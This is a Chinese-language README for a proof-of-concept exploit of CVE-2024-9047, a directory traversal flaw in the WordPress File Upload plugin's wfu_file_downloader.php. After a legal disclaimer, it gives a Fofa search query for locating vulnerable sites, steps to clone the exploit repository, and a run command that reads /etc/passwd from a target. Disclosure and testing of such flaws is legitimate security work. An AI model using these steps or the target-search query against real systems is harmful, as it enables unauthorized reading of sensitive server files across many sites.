该漏洞存在于 File Upload 插件的 wfu_file_downloader.php 组件中,该组件在请求中错误处理了 file 和 handler 参数,从而允许通过目录遍历攻击访问敏感文件。
了解更多 — CVE-2024-9047
免责声明:本概念验证(POC)仅供教育和道德测试目的使用。未经事先双方同意,使用此工具攻击目标是违法的。遵守所有适用的地方、州和联邦法律是最终用户的责任。开发人员不承担任何责任,也不对因本程序造成的任何滥用或损害负责。
要识别潜在目标,您可以使用 Fofa(一个类似于 Shodan.io 的搜索引擎)进行搜索,查询语法如下:
body="wp-content/plugins/wp-file-upload" && body="wordpress-file-upload-style-css"
首先,克隆仓库:
git clone https://github.com/verylazytech/CVE-2024-9047
cd CVE-2024-9047
chmod +x cve-2024-9047
运行漏洞利用脚本:
bash ./cve-2024-9047.sh <url> <file>
./cve-2024-9047.sh www.vulnerablewebsite.com /etc/passwd
